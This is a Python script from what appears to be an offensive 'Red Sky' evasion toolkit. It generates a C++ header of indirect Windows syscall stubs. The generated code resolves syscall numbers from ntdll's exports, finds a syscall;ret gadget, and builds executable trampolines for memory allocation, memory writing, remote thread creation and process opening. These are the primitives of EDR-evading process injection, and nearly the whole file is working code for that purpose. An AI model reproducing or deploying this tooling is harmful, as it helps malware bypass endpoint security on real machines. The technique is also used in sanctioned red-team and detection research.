# language: Python, file: Program/evade/syscall_stub.py, target: Red Sky evade — syscall stubs
# Generate indirect syscall stubs. Given NT function names, produces a C++
# header with SSN resolution + clean syscall;ret gadget jump.

import sys
from pathlib import Path
from typing import List

from Program.theme.palette import SCARLET, ARTERY, BONE, ASH, OK, CLOT, RESET, BOLD
from Program.utils import load_config, print_ok, print_err, print_info, print_warn, print_kv, print_bullet
from Program.utils.paths import OUTPUT_DIR


DEFAULT_FUNCS = [
    "NtAllocateVirtualMemory",
    "NtProtectVirtualMemory",
    "NtWriteVirtualMemory",
    "NtCreateThreadEx",
    "NtOpenProcess",
    "NtQueryInformationProcess",
    "NtCreateFile",
    "NtReadFile",
    "NtWriteFile",
    "NtClose",
    "NtWaitForSingleObject",
]

TEMPLATE = r'''// language: C++, file: {name}.hpp, target: indirect syscall stubs
// Auto-generated by redsky evade syscall_stub.
#pragma once
#include <windows.h>
#include <cstdint>
#include <cstring>
#include <unordered_map>
#include <string>

namespace sc {{

struct SyscallEntry {{ DWORD ssn; void* gadget; }};

inline std::unordered_map<std::string, SyscallEntry>& table() {{
    static std::unordered_map<std::string, SyscallEntry> t;
    return t;
}}

inline void* FindSyscallGadget() {{
    auto ntdll = (BYTE*)GetModuleHandleA("ntdll.dll");
    if (!ntdll) return nullptr;
    auto dos = (IMAGE_DOS_HEADER*)ntdll;
    auto nt  = (IMAGE_NT_HEADERS*)(ntdll + dos->e_lfanew);
    auto sec = IMAGE_FIRST_SECTION(nt);
    for (int i = 0; i < nt->FileHeader.NumberOfSections; ++i, ++sec) {{
        if (memcmp(sec->Name, ".text", 5) != 0) continue;
        BYTE* start = ntdll + sec->VirtualAddress;
        BYTE* end   = start + sec->Misc.VirtualSize;
        for (BYTE* p = start; p < end - 3; ++p) {{
            if (p[0] == 0x0F && p[1] == 0x05 && p[2] == 0xC3) return p;
        }}
    }}
    return nullptr;
}}

inline DWORD ResolveSsn(const char* name) {{
    auto ntdll = (BYTE*)GetModuleHandleA("ntdll.dll");
    if (!ntdll) return 0xFFFFFFFF;
    auto dos = (IMAGE_DOS_HEADER*)ntdll;
    auto nt  = (IMAGE_NT_HEADERS*)(ntdll + dos->e_lfanew);
    auto exp = (IMAGE_EXPORT_DIRECTORY*)(ntdll +
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    auto names = (DWORD*)(ntdll + exp->AddressOfNames);
    auto funcs = (DWORD*)(ntdll + exp->AddressOfFunctions);
    auto ords  = (WORD*)(ntdll + exp->AddressOfNameOrdinals);
    for (DWORD i = 0; i < exp->NumberOfNames; ++i) {{
        const char* fn = (const char*)(ntdll + names[i]);
        if (strcmp(fn, name) != 0) continue;
        BYTE* stub = ntdll + funcs[ords[i]];
        for (int j = 0; j < 32; ++j) {{
            if (stub[j] == 0xB8) {{
                DWORD ssn = *(DWORD*)(stub + j + 1);
                if (ssn < 0x2000) return ssn;
            }}
        }}
    }}
    return 0xFFFFFFFF;
}}

inline void* BuildStub(DWORD ssn, void* gadget) {{
    BYTE* mem = (BYTE*)VirtualAlloc(nullptr, 32, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!mem) return nullptr;
    BYTE code[] = {{
        0x4C, 0x8B, 0xD1,
        0xB8, 0, 0, 0, 0,
        0xFF, 0x25, 0x00, 0x00, 0x00, 0x00,
        0,0,0,0,0,0,0,0
    }};
    *(DWORD*)(code + 4) = ssn;
    *(void**)(code + 16) = gadget;
    memcpy(mem, code, sizeof(code));
    return mem;
}}

inline void Init() {{
    void* gadget = FindSyscallGadget();
    if (!gadget) return;
{init_body}
}}

inline void* Get(const char* name) {{
    auto& t = table();
    auto it = t.find(name);
    if (it == t.end()) return nullptr;
    static std::unordered_map<std::string, void*> stubs;
    auto s = stubs.find(name);
    if (s != stubs.end()) return s->second;
    void* stub = BuildStub(it->second.ssn, it->second.gadget);
    stubs[name] = stub;
    return stub;
}}

}} // namespace sc
'''


def build_header(funcs: List[str], name: str = "syscalls") -> str:
    body = "\n".join(
        f'    {{ DWORD s = ResolveSsn("{f}"); if (s != 0xFFFFFFFF) table()["{f}"] = {{ s, gadget }}; }}'
        for f in funcs
    )
    return TEMPLATE.format(name=name, init_body=body)


def cmd_gen(args: List[str]) -> int:
    funcs = list(DEFAULT_FUNCS)
    out_file = ""
    name = "syscalls"

    i = 0
    while i < len(args):
        a = args[i]
        if a == "--out" and i + 1 < len(args):
            out_file = args[i + 1]; i += 2; continue
        if a == "--name" and i + 1 < len(args):
            name = args[i + 1]; i += 2; continue
        if a == "--funcs" and i + 1 < len(args):
            funcs = [f.strip() for f in args[i + 1].split(",") if f.strip()]
            i += 2; continue
        i += 1

    print_info(f"generating syscall stubs for {len(funcs)} function(s)")
    for f in funcs:
        print(f"  {ARTERY}▓{RESET} {BONE}{f}{RESET}")
    print()

    header = build_header(funcs, name)
    out = Path(out_file) if out_file else OUTPUT_DIR / "evade" / f"{name}.hpp"
    out.parent.mkdir(parents=True, exist_ok=True)
    out.write_text(header)
    print_kv("saved", out)
    return 0


def run_cli(args: List[str]) -> int:
    return cmd_gen(args)


if __name__ == "__main__":
    sys.exit(run_cli(sys.argv[1:]))
